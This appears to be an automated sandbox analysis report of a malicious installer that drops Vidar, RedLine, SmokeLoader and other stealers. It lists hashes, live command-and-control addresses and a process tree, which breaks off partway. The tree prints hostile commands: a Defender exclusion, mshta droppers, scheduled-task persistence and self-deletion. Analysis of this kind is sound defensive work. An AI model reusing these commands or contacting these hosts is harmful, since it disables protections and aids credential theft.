Resubmissions

11-09-2021 09:47

210911-lr7snabca6 10

10-09-2021 20:48

210910-zlwebsaeh8 10

Analysis

  • max time kernel
    530s
  • max time network
    1807s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    11-09-2021 09:47

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.4MB

  • MD5

    65eed0fdbee8b81c1b9118f86700c6fd

  • SHA1

    fcca1e88a99e2f20403e963b798e3f68f58d638d

  • SHA256

    3cf08993fa4866df41dc37cec849e5a5e9d0bcb6ea6660c30130d9e2fd2f623d

  • SHA512

    f4c88eea9b410ea353ca9dc10c97dcfb360f9ef115d17eca1f12a4a702bc0b787cf48bfb2e6d993b8ad64ff4a0f9a2165d70eb1ae7b48652a3f5d8862543b3ac

Malware Config

Extracted

Family

vidar

Version

40.5

Botnet

706

C2

https://gheorghip.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

pab123

C2

45.14.49.169:22411

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 13 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 13 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 33 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 8 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 33 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 13 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 27 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:296
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
      • Drops file in System32 directory
      PID:1036
      • C:\Users\Admin\AppData\Roaming\bewsube
        C:\Users\Admin\AppData\Roaming\bewsube
        2⤵
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:6960
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
      1⤵
        PID:1100
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Themes
        1⤵
          PID:1176
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s UserManager
          1⤵
            PID:1408
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1396
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
              1⤵
                PID:2728
                • C:\Windows\system32\wbem\WMIADAP.EXE
                  wmiadap.exe /F /T /R
                  2⤵
                    PID:1084
                • C:\Windows\Explorer.EXE
                  C:\Windows\Explorer.EXE
                  1⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: GetForegroundWindowSpam
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of SetWindowsHookEx
                  PID:3020
                  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:364
                    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:1136
                      • C:\Users\Admin\AppData\Local\Temp\7zS0744FE84\setup_install.exe
                        "C:\Users\Admin\AppData\Local\Temp\7zS0744FE84\setup_install.exe"
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:1440
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2676
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                            6⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3192
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c Fri192c305b4a.exe
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2768
                          • C:\Users\Admin\AppData\Local\Temp\7zS0744FE84\Fri192c305b4a.exe
                            Fri192c305b4a.exe
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4068
                            • C:\Users\Admin\AppData\Local\Temp\tmpC336_tmp.exe
                              "C:\Users\Admin\AppData\Local\Temp\tmpC336_tmp.exe"
                              7⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              PID:5076
                              • C:\Windows\SysWOW64\dllhost.exe
                                dllhost.exe
                                8⤵
                                  PID:4368
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c cmd < Attesa.wmv
                                  8⤵
                                    PID:4340
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd
                                      9⤵
                                        PID:5296
                                        • C:\Windows\SysWOW64\findstr.exe
                                          findstr /V /R "^VksJcWfNcDMqfgfCCoOQaENLrlkioAEZRevWUFgpnuTZyylQxdxsqDodbFGlKiEVZMohRaHWUFajKOGYZxNRyhZgTymgZtndBYqaWXYwInbclWFIZIldx$" Braccio.wmv
                                          10⤵
                                            PID:4548
                                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                            Adorarti.exe.com u
                                            10⤵
                                            • Executes dropped EXE
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of SendNotifyMessage
                                            PID:4012
                                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                              C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                              11⤵
                                              • Executes dropped EXE
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of SendNotifyMessage
                                              PID:6128
                                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                12⤵
                                                • Executes dropped EXE
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                PID:5312
                                                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                  13⤵
                                                    PID:5876
                                                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                      14⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of SendNotifyMessage
                                                      PID:5100
                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                        15⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SendNotifyMessage
                                                        PID:4680
                                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                          16⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of FindShellTrayWindow
                                                          • Suspicious use of SendNotifyMessage
                                                          PID:5760
                                                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                            C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                            17⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of FindShellTrayWindow
                                                            • Suspicious use of SendNotifyMessage
                                                            PID:3516
                                                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                              C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                              18⤵
                                                              • Executes dropped EXE
                                                              PID:5428
                                            • C:\Windows\SysWOW64\PING.EXE
                                              ping localhost
                                              10⤵
                                              • Runs ping.exe
                                              PID:4844
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Fri192b9eeaa03b.exe
                                    5⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:2784
                                    • C:\Users\Admin\AppData\Local\Temp\7zS0744FE84\Fri192b9eeaa03b.exe
                                      Fri192b9eeaa03b.exe
                                      6⤵
                                      • Executes dropped EXE
                                      PID:3168
                                      • C:\Users\Admin\AppData\Local\Temp\is-URISL.tmp\Fri192b9eeaa03b.tmp
                                        "C:\Users\Admin\AppData\Local\Temp\is-URISL.tmp\Fri192b9eeaa03b.tmp" /SL5="$5005C,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS0744FE84\Fri192b9eeaa03b.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:2332
                                        • C:\Users\Admin\AppData\Local\Temp\is-I15PN.tmp\46807GHF____.exe
                                          "C:\Users\Admin\AppData\Local\Temp\is-I15PN.tmp\46807GHF____.exe" /S /UID=burnerch2
                                          8⤵
                                          • Drops file in Drivers directory
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Drops file in Program Files directory
                                          PID:4604
                                          • C:\Program Files\Java\OYQMBYUTJG\ultramediaburner.exe
                                            "C:\Program Files\Java\OYQMBYUTJG\ultramediaburner.exe" /VERYSILENT
                                            9⤵
                                            • Executes dropped EXE
                                            PID:3756
                                            • C:\Users\Admin\AppData\Local\Temp\is-LL1NM.tmp\ultramediaburner.tmp
                                              "C:\Users\Admin\AppData\Local\Temp\is-LL1NM.tmp\ultramediaburner.tmp" /SL5="$203A8,281924,62464,C:\Program Files\Java\OYQMBYUTJG\ultramediaburner.exe" /VERYSILENT
                                              10⤵
                                              • Executes dropped EXE
                                              • Drops file in Program Files directory
                                              • Suspicious use of FindShellTrayWindow
                                              PID:5328
                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                11⤵
                                                • Executes dropped EXE
                                                PID:5500
                                          • C:\Users\Admin\AppData\Local\Temp\b1-2f47b-7c9-2ae9a-156f009033d61\Saejonumupae.exe
                                            "C:\Users\Admin\AppData\Local\Temp\b1-2f47b-7c9-2ae9a-156f009033d61\Saejonumupae.exe"
                                            9⤵
                                            • Executes dropped EXE
                                            • Checks computer location settings
                                            PID:4404
                                          • C:\Users\Admin\AppData\Local\Temp\70-65722-ef6-0a9b7-26758e7eb86b3\Paeqaebojomi.exe
                                            "C:\Users\Admin\AppData\Local\Temp\70-65722-ef6-0a9b7-26758e7eb86b3\Paeqaebojomi.exe"
                                            9⤵
                                            • Executes dropped EXE
                                            PID:5468
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pmwzdywr.xek\GcleanerEU.exe /eufive & exit
                                              10⤵
                                                PID:5416
                                                • C:\Users\Admin\AppData\Local\Temp\pmwzdywr.xek\GcleanerEU.exe
                                                  C:\Users\Admin\AppData\Local\Temp\pmwzdywr.xek\GcleanerEU.exe /eufive
                                                  11⤵
                                                  • Executes dropped EXE
                                                  PID:4660
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oastatjx.jnl\installer.exe /qn CAMPAIGN="654" & exit
                                                10⤵
                                                  PID:1864
                                                  • C:\Windows\System32\Conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    11⤵
                                                      PID:4036
                                                    • C:\Users\Admin\AppData\Local\Temp\oastatjx.jnl\installer.exe
                                                      C:\Users\Admin\AppData\Local\Temp\oastatjx.jnl\installer.exe /qn CAMPAIGN="654"
                                                      11⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Enumerates connected drives
                                                      • Modifies system certificate store
                                                      PID:4640
                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\oastatjx.jnl\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\oastatjx.jnl\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631101553 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                        12⤵
                                                          PID:5416
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mot2va3v.aje\anyname.exe & exit
                                                      10⤵
                                                        PID:4560
                                                        • C:\Users\Admin\AppData\Local\Temp\mot2va3v.aje\anyname.exe
                                                          C:\Users\Admin\AppData\Local\Temp\mot2va3v.aje\anyname.exe
                                                          11⤵
                                                          • Executes dropped EXE
                                                          PID:4132
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\25mrs2c2.m4z\gcleaner.exe /mixfive & exit
                                                        10⤵
                                                          PID:636
                                                          • C:\Users\Admin\AppData\Local\Temp\25mrs2c2.m4z\gcleaner.exe
                                                            C:\Users\Admin\AppData\Local\Temp\25mrs2c2.m4z\gcleaner.exe /mixfive
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Checks processor information in registry
                                                            PID:848
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\unp2bgn4.2tz\autosubplayer.exe /S & exit
                                                          10⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of FindShellTrayWindow
                                                          • Suspicious use of SendNotifyMessage
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:5876
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iaap5cuo.rts\installer.exe /qn CAMPAIGN=654 & exit
                                                          10⤵
                                                            PID:4396
                                                            • C:\Users\Admin\AppData\Local\Temp\iaap5cuo.rts\installer.exe
                                                              C:\Users\Admin\AppData\Local\Temp\iaap5cuo.rts\installer.exe /qn CAMPAIGN=654
                                                              11⤵
                                                              • Executes dropped EXE
                                                              PID:2872
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a0tuphen.iwn\app.exe /8-2222 & exit
                                                            10⤵
                                                              PID:4676
                                                              • C:\Users\Admin\AppData\Local\Temp\a0tuphen.iwn\app.exe
                                                                C:\Users\Admin\AppData\Local\Temp\a0tuphen.iwn\app.exe /8-2222
                                                                11⤵
                                                                • Executes dropped EXE
                                                                PID:5380
                                                                • C:\Users\Admin\AppData\Local\Temp\a0tuphen.iwn\app.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\a0tuphen.iwn\app.exe" /8-2222
                                                                  12⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  • Modifies system certificate store
                                                                  PID:6304
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c Fri191454c4b4.exe
                                                    5⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:3096
                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0744FE84\Fri191454c4b4.exe
                                                      Fri191454c4b4.exe
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:4036
                                                      • C:\ProgramData\5475534.exe
                                                        "C:\ProgramData\5475534.exe"
                                                        7⤵
                                                          PID:4200
                                                        • C:\ProgramData\3709003.exe
                                                          "C:\ProgramData\3709003.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          PID:4324
                                                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:5288
                                                        • C:\ProgramData\206023.exe
                                                          "C:\ProgramData\206023.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4648
                                                          • C:\ProgramData\206023.exe
                                                            "C:\ProgramData\206023.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:5104
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 892
                                                            8⤵
                                                            • Drops file in Windows directory
                                                            • Program crash
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4544
                                                        • C:\ProgramData\8552742.exe
                                                          "C:\ProgramData\8552742.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5040
                                                        • C:\ProgramData\4427747.exe
                                                          "C:\ProgramData\4427747.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:4976
                                                          • C:\Windows\SysWOW64\mshta.exe
                                                            "C:\Windows\System32\mshta.exe" VbScRIpt: CLOSE (CrEATEoBJeCT( "wsCrIPt.SHell" ). rUn( "C:\Windows\system32\cmd.exe /Q /C TYPE ""C:\ProgramData\4427747.exe"" > uIA5.eXE && STaRt UiA5.eXe /P0NTOdcYDlh~kX43m7& if """" == """" for %D in ( ""C:\ProgramData\4427747.exe"" ) do taskkill /Im ""%~NxD"" /f " , 0 , TRuE) )
                                                            8⤵
                                                              PID:5728
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\system32\cmd.exe" /Q /C TYPE "C:\ProgramData\4427747.exe" > uIA5.eXE && STaRt UiA5.eXe /P0NTOdcYDlh~kX43m7& if "" == "" for %D in ( "C:\ProgramData\4427747.exe" ) do taskkill /Im "%~NxD" /f
                                                                9⤵
                                                                  PID:4616
                                                                  • C:\Users\Admin\AppData\Local\Temp\uIA5.eXE
                                                                    UiA5.eXe /P0NTOdcYDlh~kX43m7
                                                                    10⤵
                                                                    • Executes dropped EXE
                                                                    PID:4152
                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                      "C:\Windows\System32\mshta.exe" VbScRIpt: CLOSE (CrEATEoBJeCT( "wsCrIPt.SHell" ). rUn( "C:\Windows\system32\cmd.exe /Q /C TYPE ""C:\Users\Admin\AppData\Local\Temp\uIA5.eXE"" > uIA5.eXE && STaRt UiA5.eXe /P0NTOdcYDlh~kX43m7& if ""/P0NTOdcYDlh~kX43m7"" == """" for %D in ( ""C:\Users\Admin\AppData\Local\Temp\uIA5.eXE"" ) do taskkill /Im ""%~NxD"" /f " , 0 , TRuE) )
                                                                      11⤵
                                                                        PID:6092
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\system32\cmd.exe" /Q /C TYPE "C:\Users\Admin\AppData\Local\Temp\uIA5.eXE" > uIA5.eXE && STaRt UiA5.eXe /P0NTOdcYDlh~kX43m7& if "/P0NTOdcYDlh~kX43m7" == "" for %D in ( "C:\Users\Admin\AppData\Local\Temp\uIA5.eXE" ) do taskkill /Im "%~NxD" /f
                                                                          12⤵
                                                                            PID:5916
                                                                            • C:\Windows\System32\Conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              13⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4200
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          "C:\Windows\System32\rundll32.exe" MVqJ65P._,hfmnID
                                                                          11⤵
                                                                          • Loads dropped DLL
                                                                          PID:736
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /Im "4427747.exe" /f
                                                                        10⤵
                                                                        • Kills process with taskkill
                                                                        PID:4224
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c Fri192902b3c24.exe
                                                              5⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:3972
                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0744FE84\Fri192902b3c24.exe
                                                                Fri192902b3c24.exe
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:848
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im Fri192902b3c24.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS0744FE84\Fri192902b3c24.exe" & del C:\ProgramData\*.dll & exit
                                                                  7⤵
                                                                    PID:5812
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /im Fri192902b3c24.exe /f
                                                                      8⤵
                                                                      • Kills process with taskkill
                                                                      PID:4824
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout /t 6
                                                                      8⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:2296
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c Fri19d30056588.exe
                                                                5⤵
                                                                  PID:4012
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0744FE84\Fri19d30056588.exe
                                                                    Fri19d30056588.exe
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:756
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                                      7⤵
                                                                      • Blocklisted process makes network request
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4036
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /f /im chrome.exe
                                                                        8⤵
                                                                        • Kills process with taskkill
                                                                        PID:5628
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c Fri19ca03f05489b.exe
                                                                  5⤵
                                                                    PID:3164
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0744FE84\Fri19ca03f05489b.exe
                                                                      Fri19ca03f05489b.exe
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:504
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c Fri19927b4fe38a9d1.exe
                                                                    5⤵
                                                                      PID:988
                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0744FE84\Fri19927b4fe38a9d1.exe
                                                                        Fri19927b4fe38a9d1.exe
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        PID:1144
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c Fri19870e2febf5544.exe
                                                                      5⤵
                                                                        PID:3736
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0744FE84\Fri19870e2febf5544.exe
                                                                          Fri19870e2febf5544.exe
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Checks SCSI registry key(s)
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious behavior: MapViewOfSection
                                                                          PID:3356
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c Fri192f077acf656dd.exe
                                                                        5⤵
                                                                          PID:2688
                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0744FE84\Fri192f077acf656dd.exe
                                                                            Fri192f077acf656dd.exe
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:3960
                                                                            • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:3844
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                8⤵
                                                                                  PID:5732
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                    9⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:5924
                                                                                • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                  8⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:3736
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                    9⤵
                                                                                      PID:636
                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                        10⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:6792
                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                      9⤵
                                                                                        PID:6156
                                                                                      • C:\Windows\explorer.exe
